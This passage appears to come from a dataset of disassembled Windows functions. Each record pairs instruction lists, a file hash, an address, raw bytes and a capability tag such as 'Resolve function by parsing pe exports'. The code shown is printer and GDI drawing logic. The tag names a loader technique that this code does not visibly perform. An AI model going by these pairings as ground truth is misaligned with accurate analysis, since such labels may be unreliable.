"mov byte [esp + 0x1430], 1",
"call fcn.004abb75",
"lea ecx, [esp + 0x10]",
"mov byte [esp + 0x1430], 0",
"call fcn.004acaf4",
"lea ecx, [esp + 0x78]",
"mov dword [esp + 0x1430], 0xffffffff",
"call fcn.004425d0",
"xor eax, eax",
"jmp 0x441d40",
"mov edx, dword [esp + 0x2c]",
"lea ecx, [esp + 0x10]",
"lea eax, [edx + ebx*4]",
"push eax",
"call fcn.004acbe1",
"mov edx, dword [esp + 0x10]",
"xor esi, esi",
"lea ecx, [esp + 0x14]",
"push esi",
"push ecx",
"push edx",
"call sub.WINSPOOL.DRV_OpenPrinterA",
"cmp eax, 1",
"jne 0x441ce6",
"mov ecx, dword [esp + 0x10]",
"mov edx, dword [esp + 0x14]",
"push esi",
"lea eax, [esp + 0x1a4]",
"push esi",
"push eax",
"push ecx",
"push edx",
"push esi",
"call sub.WINSPOOL.DRV_DocumentPropertiesA",
"lea ecx, [esp + 0x64]",
"mov edi, eax",
"call fcn.00413320",
"push edi",
"lea ecx, [esp + 0x68]",
"mov byte [esp + 0x1434], 5",
"call fcn.00413340",
"mov ebp, eax",
"mov eax, dword [esp + 0xc8]",
"cmp eax, edi",
"jne 0x441c6f",
"mov esi, dword [esp + 0xc0]",
"mov ecx, edi",
"neg eax",
"sbb eax, eax",
"mov edi, ebp",
"and eax, esi",
"mov esi, eax",
"mov eax, ecx",
"shr ecx, 2",
"rep movsd dword es:[edi], dword [esi]",
"mov ecx, eax",
"and ecx, 3",
"rep movsb byte es:[edi], byte [esi]",
"jmp 0x441c8d",
"mov ecx, dword [esp + 0x10]",
"mov edx, dword [esp + 0x14]",
"push 2",
"push 0",
"push ebp",
"push ecx",
"push edx",
"push 0",
"call sub.WINSPOOL.DRV_DocumentPropertiesA",
"mov eax, dword [ebp + 0x28]",
"or al, 3",
"mov dword [ebp + 0x28], eax",
"mov ax, word [esp + 0xcc]",
"push ebp",
"mov word [ebp + 0x2e], ax",
"mov cx, word [esp + 0xd2]",
"mov word [ebp + 0x2c], cx",
"mov edx, dword [esp + 0x44]",
"mov ecx, dword [esp + 0x58]",
"mov eax, dword [edx + ebx*4]",
"mov edx, dword [esp + 0x14]",
"mov ebx, dword [ecx + ebx*4]",
"push eax",
"push edx",
"push ebx",
"call dword [sym.imp.GDI32.dll_CreateDCA]",
"mov esi, eax",
"mov eax, dword [esp + 0x14]",
"push eax",
"call sub.WINSPOOL.DRV_ClosePrinter",
"lea ecx, [esp + 0x64]",
"mov byte [esp + 0x1430], 4",
"mov dword [esp + 0x64], 0x4dcfa8",
"call fcn.00413520",
"lea ecx, [esp + 0x3c]",
"mov byte [esp + 0x1430], 3",
"call fcn.004abb75",
"lea ecx, [esp + 0x50]",
"mov byte [esp + 0x1430], 2",
"call fcn.004abb75",
"lea ecx, [esp + 0x28]",
"mov byte [esp + 0x1430], 1",
"call fcn.004abb75",
"lea ecx, [esp + 0x10]",
"mov byte [esp + 0x1430], 0",
"call fcn.004acaf4",
"lea ecx, [esp + 0x78]",
"mov dword [esp + 0x1430], 0xffffffff",
"call fcn.004425d0",
"mov eax, esi",
"mov ecx, dword [esp + 0x1428]",
"pop edi",
"pop esi",
"pop ebp",
"pop ebx",
"mov dword fs:[0], ecx",
"add esp, 0x1424",
"ret"
] |
f53a5abe6cd77afda63f23dd6f0e75472256e1f40737ab4e61eea0208fed039d
|
0x444da0
|
[
"Resolve function by parsing pe exports"
] |
6aff680fb14b0064a100000000506489250000000081ec6c02000055568bf157568d8c24bc000000e834e806008d8424b001000033ed508d8c24bc00000089ac2484020000e8c8e306008bcee84ffaffff8bf83bfd897c244c0f84ae1500008bcfe83ab8ffff85c00f849f1500008bcfe86bb8ffff85c00f849015000039ae4c04000074078bcee8b4160000538bcee89cf9ffff558bce89842490010000e89df9ffff8b4e5c8b5658518d8424c00000005250e8c861010083c40c8d8c24bc000000518d8c24ac010000e881f1ffff8b8424b80100008b8c24bc0100008b9424b40100008b3da8f14b0089442478894c247c8b8c24c40000008d442474895424748b9424c00100006a025051c6842490020000028994248c000000ffd78b461c8d9424980000005250ff1538f64b008b9424c40000008d8c24980000006a025152ffd78b8424980000008b8c249c0000008b9424a00000008bbc24a400000089842418010000898424280100008d8424b4000000898c241c010000898c242c010000508bce8994242401000089bc24280100008994243401000089bc2438010000e8ea1400008b388b8c249800000003cf8d9424980000008b58048b84249c000000898c249800000003c38d4c24748984249c000000518d84249c0000005250ff15ccf54b008b8c24980000008b94249c000000894c24148b8424a00000008b8c24a4000000895424188944241c8b8424c40000008d5424146a025250894c242cff1594f14b0089ac244c010000c7842448010000fc474e008d4c2414c68424840200000351ff158cf14b00508d8c244c010000e848e706008b8424180100008d54247403c7528984241c0100008d84241c0100008d8c241c0100005051ff15ccf54b008b84241c0100008b8c24200100008b94241801000089442418894c241c8b8c24c40000008d442414895424148b9424240100006a0250518954242cff1594f14b0089ac2454010000c7842450010000fc474e008b3d8cf14b008d54241452c684248802000004ffd7508d8c2454010000e8a8e606008b94242c0100008d44247403d38d8c24280100008994242c010000508d94242c0100005152ff15ccf54b008b8c242c0100008b9424300100008b842428010000894c24188954241c8b9424c40000008d4c2414894424148b8424340100006a0251528944242cff1594f14b0089ac2460010000bbfc474e00899c245c0100008d442414c68424840200000550ffd7508d8c2460010000e80de60600896c246c895c2468896c244c895c24488d8c24b4010000c68424840200000751ffd7508d4c246ce8e1e506008b9424c40000008b3db0f14b006a0652ffd750e8b4e50600898424900100008b8424c40000006a0150ffd750e89be506008b8c24c40000006a02518984249c010000ffd750e882e506006a018d8c24c0000000898424b4010000e8b2dc06008b46448b7c2450d1e883e0018bcf89842444010000e867b4ffff8bcf89442464e81cb5ffff8bd88bcf895c2458e88fb4ffff8bcf89442444e814b5ffff8bf86a018bce897c243ce852aa060003c3558bce8944242ce844aa06008d9424b400000003c7528bce89442414e8b2efffff8b08894c243c8b500489ac249400000089542440c784249000000068e94d008d8424900000008bce50c684248802000008e82cf6ffff6a0fff15f0f54b00508d8c2478010000e885e5060068ffffff0055558d8c2444010000c684249002000009e81ae50600688080800055558d8c241c010000c68424900200000ae8ffe406005555558d8c24d0010000c68424900200000be8e8e40600b80500000089ac246401000089ac246c01000089ac24680100008984247001000089ac247c01000089ac248401000089ac2480010000898424880100008d8c24ec010000c68424840200000ee8d9d4ffff8b0dcc625000898c24b0000000c684248402000010c7442454010000008b7c245483ff020f85860000006a018d8c24c0000000e809dc06008b56408d8c24b400000052e89fe406003bc5750433c9eb038b48048b54246c8d442468f7d81bc05123c2508b8424c800000050ff1590f04b00c78424b4000000083a4e008d8c24b4000000c684248402000011e8f1e306008b4e5c8b5658518d8424c00000005250c684249002000010e85c5c010083c40c83bc2444010000010f85c00700008b4c24788b4424403bc80f8fc704000083ff010f85450100008b44243833ff33db3bc57e1c538bcee8feecffff50578bcee8b5eeffff8bf88b442438433bd87ce48b5c24108b4424443bd87d1c538bcee8d6ecffff50578bcee88deeffff8bf88b442444433bd87ce48b54243c8b44244003fa8d4c2474894424208d542414518d4424185250896c2420897c2428896c2424ff15ccf54b008d4c241451ff150cf64b0085c00f852c0400008b8424c40000008d5424146a025250ff1594f14b008d4c241451ff158cf14b00508d4c244ce897e206008b7c244c8d4424488b54246c8d4c2468f7d81bc06a0423c7f7d91bc95023ca5152ff1588f04b008d4c2448e8bee206008b8424c40000008d5424146a025250ff15a8f14b008d8c2474010000518d8c24c0000000e892d806008b4424208b5424188b4c241c8b7c24142bc22bcf682100f0005051528b9424d00000005752ff1594f04b00e9790300008b4424108b5424388b4c24442bc233db8944242c8d78ff3bf9897c24240f8d56030000eb048b44242c3b5c247c0f8f460300003bf80f8c0c0100008b4424103bf88b7c24247d0a8bc88b4424382bf903f8578bce895c2418e870ebffff50538bcee827edffff8944241c8b4424408d4c2474894424208d542414518d8424d00100005250896c2424ff15ccf54b008b9424d00100008b8c24cc0100008b8424d4010000899424e0010000898c24dc0100008b8c24d80100008d9424dc010000898424e401000052898c24ec010000ff150cf64b0085c0756b8b4c24508d8424b00000005057e8a3b0ffff8d8c249000000085c9741a8b8424940000003bc5740f8b9424c00000005052ff15a0f04b00558d8c24c0000000e8dad806008b8424b00000008d5424146825080000528b48f851508b8424cc0000008d8c24cc000000ff50688b7c24248d8c2410010000518d8c24c0000000e807d706008b54242c8d42ff3bf80f85020100008b44243c8b4c24743bc10f8ce90000008b9424c4000000b8010000008d4c24305051528944243c89442440ff15a8f14b008d8424380100008d8c24bc00000050e8b3d606008b5c24408b4c2430538d94242c02000051528d8c24c8000000e886db06008b4424348b4c243050518d8c24c4000000e8bcdb06008b5424348b44243c52508d8c24c4000000e8a6db06008d8c2410010000518d8c24c0000000e855d60600538d94243c02000055528d8c24c8000000e830db060055558d8c24c4000000e86edb06008b44243c55508d8c24c4000000e85cdb06008b4c243c53518d8c24c4000000e84adb060053558d8c24c4000000e83cdb06008b5c243ce9fc0000008b4c24108bc73bf97d082bc18b4c243803c1508bcee847e9ffff50538bcee8feeaffff8bf88b4424743bf80f8cc50000008b8424c40000008d5424306a015250895c243c896c2440ff1594f14b008b4c24308b9424c4000000416a01894c24348d4c24345152ff15a8f14b008d8424380100008d8c24bc00000050e876d506008b4c24408b542430518d84244402000052508d8c24c8000000e849da06008b4c243055518d8c24c4000000e883da06008d9424100100008d8c24bc00000052e832d5060055578d8c24c4000000e861da06008b4424408d8c24bc0000005057e84fda06008b4c244051538d8c24c4000000e83dda06008bdf8b7c24248b442444473bf8897c24240f8cacfcffff8b5424748b44243c3bd00f8fd00200008b5c24288b4c24588b4424648b7c24402bd93bd8895c24240f8db2020000eb068b5c242433ed3bbc24800000000f8f9d0200008b4424283bd87d082bd88b44245803d8538bcee819e7ffff50578bcee8e0eaffff8be88b4424783be80f8c550200008b44243cc7442414000000008944241c8b44245483f801897c2418896c24200f85c60000008d4c24748d542414518d4424185250ff15ccf54b008d4c241451ff150cf64b0085c00f85080200008d9424740100008d8c24bc00000052e816d406008b4424208b5424188b4c241c8b7c24142bc22bcf682100f000508b8424c800000051525750ff1594f04b008b9424c40000008d4c24146a025152ff1594f14b008d44241450ff158cf14b00508d4c244ce86ddd06008b7c244c8d4424488b54246c8d4c2468f7d81bc06a0423c7f7d91bc95023ca5152ff1588f04b008d4c2448e894dd0600e96a0100008b9424c40000008d4c24306a015152c744243c00000000897c2440ff1594f14b008b4424348b8c24c4000000406a01894424388d4424345051ff15a8f14b008d9424380100008d8c24bc00000052e839d306008b4424348d8c2430020000506a00518d8c24c8000000e80fd806008b5424348b44243c52508d8c24c4000000e845d806008d8c2410010000518d8c24c0000000e8f4d206008b54243c55528d8c24c4000000e81fd80600556a008d8c24c4000000e810d80600576a008d8c24c4000000e801d80600438d84244802000053683c8e4f0050ff1580f64b008d8c249c00000083c40c85c9741a8b84249400000085c0740f8b9424c00000005052ff15a0f04b006a008d8c24c0000000e80dd406008d8424480200008d8c245801000050e8327006008b8424580100008d5424146825080000528b48f8c684248c0200001251508b8424cc0000008d8c24cc000000ff50688d8c2458010000c684248402000010e8816f06008b4424248b4c2464408bfd3bc1894424240f8c52fdffff33ed8b5c2440e97501000083ff020f856a010000837c2478040f8faa000000396c24580f85a0000000396c24280f8e960000008b5c24108b4c24388b4424442bd93bd8896c242c89ac24ac0000007d798b4424108bfb3bd87d0a8bc88b4424382bf903f8578bcee80ae5ffff8b4c2428898424a8000000578d41ff8b4c245450e851abffff508b44242c8d9424ac0000006a105248578b7c243c50558d8c24d400000057518bcee8ea2400008b9424a80000008bce5257e87ae6ffff8944242c8b442444433bd87c87837c2474040f8faa000000396c24380f85a0000000396c24100f8e960000008b5c24288b4c24588b4424642bd93bd8896c242c89ac24a80000007d798b4424288bfb3bd87d0a8bc88b4424582bf903f8578bcee875e3ffff8b4c2450898424ac0000008b442410485057e89eaaffff8b542410508d8c24ac0000006a088d42ff5150578b7c24408d8424d00000005755508bcee8352400008b8c24ac00000051578bcee8f5e6ffff8944242c8b442464433bd87c8733db6aff558d8c246c010000899c2490000000e8908ffeff6aff558d8c2484010000e8818ffeff8b7c24288b4c24588b4424642bf93bf8897c24240f8d76040000eb0233ed3b9c24800000000f8f650400008b4424288bef3bf87d082be88b44245803e8558bce896c2460e8a8e2ffff50538bcee86fe6ffff8bc88b4424783bc8898c24ac0100000f8c0d0400008b54243c8b4424108b5c24388994248c0000008b5424442bc33bc28944242c0f8de80300008b4c2410eb0c8b4c24108b6c245c8b44242c3bc17d088b5424382bc103c28b542428894424603bea7d133bc17d068d442474eb1b8d842418010000eb123bc18d8424280100007c078d8424980000008b088b50048b7c24608b6c245c898c24980100008b48088b9c2488000000898c24a00100006a00899424a00100008b500c8b842490000000578d8c24f401000055518b4c2460899424b401000089842494000000e8bda8ffff8d8c24ec010000e871caffffa900003c000f84550100008d8c24ec010000e85acaffffa900000400744e8b54245c8b4c24504f6a00578d8424f40100005250e879a8ffff578bcee851e2ffff8b8c2484000000f7d850518bcee8ffe3ffff8d8c24ec01000089842484000000e80ccaffffa90000040075b28d8c24ec010000e8f9c9ffffa900000800743e8b4c24504d6a00578d9424f40100005552e81ca8ffff558bcee814e1fffff7d850538bcee8d9e4ffff8d8c24ec0100008bd8e8bbc9ffffa90000080075c28b942468010000c78424400100000000000085d27e3d8b84247c0100008b8c24640100002bc8894c2470eb048b4c2470392c01750839380f84940000008b8c244001000083c004413bca898c24400100007cd983fdff744b89542470426aff528d8c246c010000e8188dfeff8b8424640100008b4c24706aff892c888b8424840100008944247440508d8c2484010000e8ef8cfeff8b94247c0100008b442470893c82837c24540275538b4c24288b44245c3bc17d208b5424108b4c246033c03bca0f9cc0488d8c245001000023c1eb1f83cdffebcd8b5424108b4424603bc28d84245c0100007c078d842448010000508d8c24c0000000e899d1060083fdff0f84e1000000837c2454010f85b00000008b9424840000008d4424148d8c249801000050516a205755538d8424d400000052508bcee87a1700008d8c24980100008d542414518d4424185250ff15ccf54b008d4c241451ff150cf64b0085c00f85cf0000008b8424c40000008d5424146a025250ff1594f14b008d4c241451ff158cf14b00508d4c244ce886d606008b6c244c8d4424488b54246c8d4c2468f7d81bc06a0423c5f7d91bc95023ca5152ff1588f04b008d4c2448e8add60600eb738b8424840000008d9424980100006a00526a015755538d8c24d400000050518bcee8cd160000837c24540275468b8424440100008b4c2460488d942498010000f7d81bc06a0083e006528b54246483c018508b842494000000518b8c249c00000052508d9424d400000051528bcee8801600008b4424608bce50e894dfffff8b8c248c00000050518bcee844e1ffff8b4c24448984248c0000008b44242c403bc18944242c0f8c29fcffff8b7c24248b8c24ac0100008b442464478bd93bf8899c2488000000897c24240f8c8efbffff33ed558d8c24c0000000e8f6cf06008b4424544083f802894424540f8e56f1ffff8b864c0400005b3bc574078bcee8f0020000558d8c24bc000000e8c5cf06008b94248c0100008d8c24b800000052e884cb06008b8424900100008d8c24b800000050e870cb06008b8c24ac010000518d8c24bc000000e85ccb06008b9424880100008bce52e898e5ffff8d8c24ac000000c68424800200000fe8986806008d8c24e8010000c68424800200000ee8b0c5ffff8b8424780100003bc5740950e8dd65060083c4048b8424600100003bc5740950e8c965060083c404be083a4e0089b424c00100008d8c24c0010000c684248002000013e8e0d4060089b4240c0100008d8c240c010000c684248002000014e8c5d4060089b424340100008d8c2434010000c684248002000015e8aad4060089b424700100008d8c2470010000c684248002000016e88fd4060089b4248c0000008d8c248c000000c684248002000017e874d40600897424448d4c2444c684248002000018e85fd40600897424648d4c2464c684248002000019e84ad4060089b424580100008d8c2458010000c68424800200001ae82fd4060089b4244c0100008d8c244c010000c68424800200001be814d4060089b424440100008d8c2444010000c68424800200001ce8f9d306008d8c24a4010000e865dcffffeb518b46408d8c24b000000050e841d406003bc5750433c0eb038b40048b9424bc0000008d8c24b0010000505152ff1508f64b00c78424b0000000083a4e008d8c24b0000000c684248002000001e89ad306008d8c24b8000000c7842480020000ffffffffe85ed206008b8c24780200005f5e5d64890d0000000081c478020000c3
|
[
"push 0xffffffffffffffff",
"push 0x4bb10f",
"mov eax, dword fs:[0]",
"push eax",
"mov dword fs:[0], esp",
"sub esp, 0x26c",
"push ebp",
"push esi",
"mov esi, ecx",
"push edi",
"push esi",
"lea ecx, [esp + 0xbc]",
"call fcn.004b3601",
"lea eax, [esp + 0x1b0]",
"xor ebp, ebp",
"push eax",
"lea ecx, [esp + 0xbc]",
"mov dword [esp + 0x284], ebp",
"call fcn.004b31b2",
"mov ecx, esi",
"call fcn.00444840",
"mov edi, eax",
"cmp edi, ebp",
"mov dword [esp + 0x4c], edi",
"je 0x4463ad",
"mov ecx, edi",
"call fcn.00440640",
"test eax, eax",
"je 0x4463ad",
"mov ecx, edi",
"call fcn.00440680",
"test eax, eax",
"je 0x4463ad",
"cmp dword [esi + 0x44c], ebp",
"je 0x444e2c",
"mov ecx, esi",
"call fcn.004464e0",
"push ebx",
"mov ecx, esi",
"call fcn.004447d0",
"push ebp",
"mov ecx, esi",
"mov dword [esp + 0x190], eax",
"call fcn.004447e0",
"mov ecx, dword [esi + 0x5c]",
"mov edx, dword [esi + 0x58]",
"push ecx",
"lea eax, [esp + 0xc0]",
"push edx",
"push eax",
"call fcn.0045b020",
"add esp, 0xc",
"lea ecx, [esp + 0xbc]",
"push ecx",
"lea ecx, [esp + 0x1ac]",
"call fcn.00443ff0",
"mov eax, dword [esp + 0x1b8]",
"mov ecx, dword [esp + 0x1bc]",
"mov edx, dword [esp + 0x1b4]",
"mov edi, dword [sym.imp.GDI32.dll_DPtoLP]",
"mov dword [esp + 0x78], eax",
"mov dword [esp + 0x7c], ecx",
"mov ecx, dword [esp + 0xc4]",
"lea eax, [esp + 0x74]",
"mov dword [esp + 0x74], edx",
"mov edx, dword [esp + 0x1c0]",
"push 2",
"push eax",
"push ecx",
"mov byte [esp + 0x290], 2",
"mov dword [esp + 0x8c], edx",
"call edi",
"mov eax, dword [esi + 0x1c]",
"lea edx, [esp + 0x98]",
"push edx",
"push eax",
"call dword [sym.imp.USER32.dll_GetClientRect]",
"mov edx, dword [esp + 0xc4]",
"lea ecx, [esp + 0x98]",
"push 2",
"push ecx",
"push edx",
"call edi",
"mov eax, dword [esp + 0x98]",
"mov ecx, dword [esp + 0x9c]",
"mov edx, dword [esp + 0xa0]",
"mov edi, dword [esp + 0xa4]",
"mov dword [esp + 0x118], eax",
"mov dword [esp + 0x128], eax",
"lea eax, [esp + 0xb4]",
"mov dword [esp + 0x11c], ecx",
"mov dword [esp + 0x12c], ecx",
"push eax",
"mov ecx, esi",
"mov dword [esp + 0x124], edx",
"mov dword [esp + 0x128], edi",
"mov dword [esp + 0x134], edx",
"mov dword [esp + 0x138], edi",
"call fcn.00446430",
"mov edi, dword [eax]",
"mov ecx, dword [esp + 0x98]",
"add ecx, edi",
"lea edx, [esp + 0x98]",
"mov ebx, dword [eax + 4]",
"mov eax, dword [esp + 0x9c]",
"mov dword [esp + 0x98], ecx",
"add eax, ebx",
"lea ecx, [esp + 0x74]",
"mov dword [esp + 0x9c], eax",
"push ecx",
"lea eax, [esp + 0x9c]",
"push edx",
"push eax",
"call dword [sym.imp.USER32.dll_IntersectRect]",
"mov ecx, dword [esp + 0x98]",
"mov edx, dword [esp + 0x9c]",
"mov dword [esp + 0x14], ecx",
"mov eax, dword [esp + 0xa0]",
"mov ecx, dword [esp + 0xa4]",
"mov dword [esp + 0x18], edx",
"mov dword [esp + 0x1c], eax",
"mov eax, dword [esp + 0xc4]",
"lea edx, [esp + 0x14]",
"push 2",
"push edx",
"push eax",
"mov dword [esp + 0x2c], ecx",
"call dword [sym.imp.GDI32.dll_LPtoDP]",
"mov dword [esp + 0x14c], ebp",
"mov dword [esp + method.CRgn.virtual_0], vtable.CRgn.0",
"lea ecx, [esp + 0x14]",
"mov byte [esp + 0x284], 3",
"push ecx",
"call dword [sym.imp.GDI32.dll_CreateRectRgnIndirect]",
"push eax",
"lea ecx, [esp + 0x14c]",
"call fcn.004b3741",
"mov eax, dword [esp + 0x118]",
"lea edx, [esp + 0x74]",
"add eax, edi",
"push edx",
"mov dword [esp + 0x11c], eax",
"lea eax, [esp + 0x11c]",
"lea ecx, [esp + 0x11c]",
"push eax",
"push ecx",
"call dword [sym.imp.USER32.dll_IntersectRect]",
"mov eax, dword [esp + 0x11c]",
"mov ecx, dword [esp + 0x120]",
"mov edx, dword [esp + 0x118]",
"mov dword [esp + 0x18], eax",
"mov dword [esp + 0x1c], ecx",
"mov ecx, dword [esp + 0xc4]",
"lea eax, [esp + 0x14]",
"mov dword [esp + 0x14], edx",
"mov edx, dword [esp + 0x124]",
"push 2",
"push eax",
"push ecx",
"mov dword [esp + 0x2c], edx",
"call dword [sym.imp.GDI32.dll_LPtoDP]",
"mov dword [esp + 0x154], ebp",
"mov dword [esp + method.CRgn.virtual_0], vtable.CRgn.0",
"mov edi, dword [sym.imp.GDI32.dll_CreateRectRgnIndirect]",
"lea edx, [esp + 0x14]",
"push edx",
"mov byte [esp + 0x288], 4",
"call edi",
"push eax",
"lea ecx, [esp + 0x154]",
"call fcn.004b3741",
"mov edx, dword [esp + 0x12c]",
"lea eax, [esp + 0x74]",
"add edx, ebx",
"lea ecx, [esp + 0x128]",
"mov dword [esp + 0x12c], edx",
"push eax",
"lea edx, [esp + 0x12c]",
"push ecx",
"push edx",
"call dword [sym.imp.USER32.dll_IntersectRect]",
"mov ecx, dword [esp + 0x12c]",
"mov edx, dword [esp + 0x130]",
"mov eax, dword [esp + 0x128]",
"mov dword [esp + 0x18], ecx",
"mov dword [esp + 0x1c], edx",
"mov edx, dword [esp + 0xc4]",
"lea ecx, [esp + 0x14]",
"mov dword [esp + 0x14], eax",
"mov eax, dword [esp + 0x134]",
"push 2",
"push ecx",
"push edx",
"mov dword [esp + 0x2c], eax",
"call dword [sym.imp.GDI32.dll_LPtoDP]",
"mov dword [esp + 0x160], ebp",
"mov ebx, vtable.CRgn.0",
"mov dword [esp + 0x15c], ebx",
"lea eax, [esp + 0x14]",
"mov byte [esp + 0x284], 5",
"push eax",
"call edi",
"push eax",
"lea ecx, [esp + 0x160]",
"call fcn.004b3741",
"mov dword [esp + 0x6c], ebp",
"mov dword [esp + 0x68], ebx",
"mov dword [esp + 0x4c], ebp",
"mov dword [esp + 0x48], ebx",
"lea ecx, [esp + 0x1b4]",
"mov byte [esp + 0x284], 7",
"push ecx",
"call edi",
"push eax",
"lea ecx, [esp + 0x6c]",
"call fcn.004b3741",
"mov edx, dword [esp + 0xc4]",
"mov edi, dword [sym.imp.GDI32.dll_GetCurrentObject]",
"push 6",
"push edx",
"call edi",
"push eax",
"call fcn.004b372c",
"mov dword [esp + 0x190], eax",
"mov eax, dword [esp + 0xc4]",
"push 1",
"push eax",
"call edi",
"push eax",
"call fcn.004b372c",
"mov ecx, dword [esp + 0xc4]",
"push 2",
"push ecx",
"mov dword [esp + 0x19c], eax",
"call edi",
"push eax",
"call fcn.004b372c",
"push 1",
"lea ecx, [esp + 0xc0]",
"mov dword [esp + 0x1b4], eax",
"call fcn.004b2e71",
"mov eax, dword [esi + 0x44]",
"mov edi, dword [esp + 0x50]",
"shr eax, 1",
"and eax, 1",
"mov ecx, edi",
"mov dword [esp + 0x144], eax",
"call fcn.00440640",
"mov ecx, edi",
"mov dword [esp + 0x64], eax",
"call fcn.00440700",
"mov ebx, eax",
"mov ecx, edi",
"mov dword [esp + 0x58], ebx",
"call fcn.00440680",
"mov ecx, edi",
"mov dword [esp + 0x44], eax",
"call fcn.00440710",
"mov edi, eax",
"push 1",
"mov ecx, esi",
"mov dword [esp + 0x3c], edi",
"call fcn.004afc5d",
"add eax, ebx",
"push ebp",
"mov ecx, esi",
"mov dword [esp + 0x2c], eax",
"call fcn.004afc5d",
"lea edx, [esp + 0xb4]",
"add eax, edi",
"push edx",
"mov ecx, esi",
"mov dword [esp + 0x14], eax",
"call fcn.004441e0",
"mov ecx, dword [eax]",
"mov dword [esp + 0x3c], ecx",
"mov edx, dword [eax + 4]",
"mov dword [esp + 0x94], ebp",
"mov dword [esp + 0x40], edx",
"mov dword [esp + 0x90], 0x4de968",
"lea eax, [esp + 0x90]",
"mov ecx, esi",
"push eax",
"mov byte [esp + 0x288], 8",
"call fcn.00444890",
"push 0xf",
"call dword [sym.imp.USER32.dll_GetSysColor]",
"push eax",
"lea ecx, [esp + 0x178]",
"call fcn.004b37fe",
"push 0xffffff",
"push ebp",
"push ebp",
"lea ecx, [esp + 0x144]",
"mov byte [esp + 0x290], 9",
"call fcn.004b37ae",
"push 0x808080",
"push ebp",
"push ebp",
"lea ecx, [esp + 0x11c]",
"mov byte [esp + 0x290], 0xa",
"call fcn.004b37ae",
"push ebp",
"push ebp",
"push ebp",
"lea ecx, [esp + 0x1d0]",
"mov byte [esp + 0x290], 0xb",
"call fcn.004b37ae",
"mov eax, 5",
"mov dword [esp + 0x164], ebp",
"mov dword [esp + 0x16c], ebp",
"mov dword [esp + 0x168], ebp",
"mov dword [esp + 0x170], eax",
"mov dword [esp + 0x17c], ebp",
"mov dword [esp + 0x184], ebp",
"mov dword [esp + 0x180], ebp",
"mov dword [esp + 0x188], eax",
"lea ecx, [esp + 0x1ec]",
"mov byte [esp + 0x284], 0xe",
"call fcn.004427f0",
"mov ecx, dword [0x5062cc]",
"mov dword [esp + 0xb0], ecx",
"mov byte [esp + 0x284], 0x10",
"mov dword [esp + 0x54], 1",
"mov edi, dword [esp + 0x54]",
"cmp edi, 2",
"jne 0x4453c7",
"push 1",
"lea ecx, [esp + 0xc0]",
"call fcn.004b2f58",
"mov edx, dword [esi + 0x40]",
"lea ecx, [esp + 0xb4]",
"push edx",
"call fcn.004b37fe",
"cmp eax, ebp",
"jne 0x445367",
"xor ecx, ecx",
"jmp 0x44536a",
"mov ecx, dword [eax + 4]",
"mov edx, dword [esp + 0x6c]",
"lea eax, [esp + 0x68]",
"neg eax",
"sbb eax, eax",
"push ecx",
"and eax, edx",
"push eax",
"mov eax, dword [esp + 0xc8]",
"push eax",
"call dword [sym.imp.GDI32.dll_FillRgn]",
"mov dword [esp + 0xb4], vtable.CGdiObject.0",
"lea ecx, [esp + 0xb4]",
"mov byte [esp + 0x284], 0x11",
"call fcn.004b3798",
"mov ecx, dword [esi + 0x5c]",
"mov edx, dword [esi + 0x58]",
"push ecx",
"lea eax, [esp + 0xc0]",
"push edx",
"push eax",
"mov byte [esp + 0x290], 0x10",
"call fcn.0045b020",
"add esp, 0xc",
"cmp dword [esp + 0x144], 1",
"jne 0x445b95",
"mov ecx, dword [esp + 0x78]",
"mov eax, dword [esp + 0x40]",
"cmp ecx, eax",
"jg 0x4458ac",
"cmp edi, 1",
"jne 0x445533",
"mov eax, dword [esp + 0x38]",
"xor edi, edi",
"xor ebx, ebx",
"cmp eax, ebp",
"jle 0x445416",
"push ebx",
"mov ecx, esi",
"call fcn.00444100",
"push eax",
"push edi",
"mov ecx, esi",
"call fcn.004442c0",
"mov edi, eax",
"mov eax, dword [esp + 0x38]",
"inc ebx",
"cmp ebx, eax",
"jl 0x4453fa",
"mov ebx, dword [esp + 0x10]",
"mov eax, dword [esp + 0x44]",
"cmp ebx, eax",
"jge 0x44543e",
"push ebx",
"mov ecx, esi",
"call fcn.00444100",
"push eax",
"push edi",
"mov ecx, esi",
"call fcn.004442c0",
"mov edi, eax",
"mov eax, dword [esp + 0x44]",
"inc ebx",
"cmp ebx, eax",
"jl 0x445422",
"mov edx, dword [esp + 0x3c]",
"mov eax, dword [esp + 0x40]",
"add edi, edx",
"lea ecx, [esp + 0x74]",
"mov dword [esp + 0x20], eax",
"lea edx, [esp + 0x14]",
"push ecx",
"lea eax, [esp + 0x18]",
"push edx",
"push eax",
"mov dword [esp + 0x20], ebp",
"mov dword [esp + 0x28], edi",
"mov dword [esp + 0x24], ebp",
"call dword [sym.imp.USER32.dll_IntersectRect]",
"lea ecx, [esp + 0x14]",
"push ecx",
"call dword [sym.imp.USER32.dll_IsRectEmpty]",
"test eax, eax",
"jne 0x4458ac",
"mov eax, dword [esp + 0xc4]",
"lea edx, [esp + 0x14]",
"push 2",
"push edx",
"push eax",
"call dword [sym.imp.GDI32.dll_LPtoDP]",
"lea ecx, [esp + 0x14]",
"push ecx",
"call dword [sym.imp.GDI32.dll_CreateRectRgnIndirect]",
"push eax",
"lea ecx, [esp + 0x4c]",
"call fcn.004b3741",
"mov edi, dword [esp + 0x4c]",
"lea eax, [esp + 0x48]",
"mov edx, dword [esp + 0x6c]",
"lea ecx, [esp + 0x68]",
"neg eax",
"sbb eax, eax",
"push 4",
"and eax, edi",
"neg ecx",
"sbb ecx, ecx",
"push eax",
"and ecx, edx",
"push ecx",
"push edx",
"call dword [sym.imp.GDI32.dll_CombineRgn]",
"lea ecx, [esp + 0x48]",
"call fcn.004b3798",
"mov eax, dword [esp + 0xc4]",
"lea edx, [esp + 0x14]",
"push 2",
"push edx",
"push eax",
"call dword [sym.imp.GDI32.dll_DPtoLP]",
"lea ecx, [esp + 0x174]",
"push ecx",
"lea ecx, [esp + 0xc0]",
"call fcn.004b2d95",
"mov eax, dword [esp + 0x20]",
"mov edx, dword [esp + 0x18]",
"mov ecx, dword [esp + 0x1c]",
"mov edi, dword [esp + 0x14]",
"sub eax, edx",
"sub ecx, edi",
"push 0xf00021",
"push eax",
"push ecx",
"push edx",
"mov edx, dword [esp + 0xd0]",
"push edi",
"push edx",
"call dword [sym.imp.GDI32.dll_PatBlt]",
"jmp 0x4458ac",
"mov eax, dword [esp + 0x10]",
"mov edx, dword [esp + 0x38]",
"mov ecx, dword [esp + 0x44]",
"sub eax, edx",
"xor ebx, ebx",
"mov dword [esp + 0x2c], eax",
"lea edi, [eax - 1]",
"cmp edi, ecx",
"mov dword [esp + 0x24], edi",
"jge 0x4458ac",
"jmp 0x44555c",
"mov eax, dword [esp + 0x2c]",
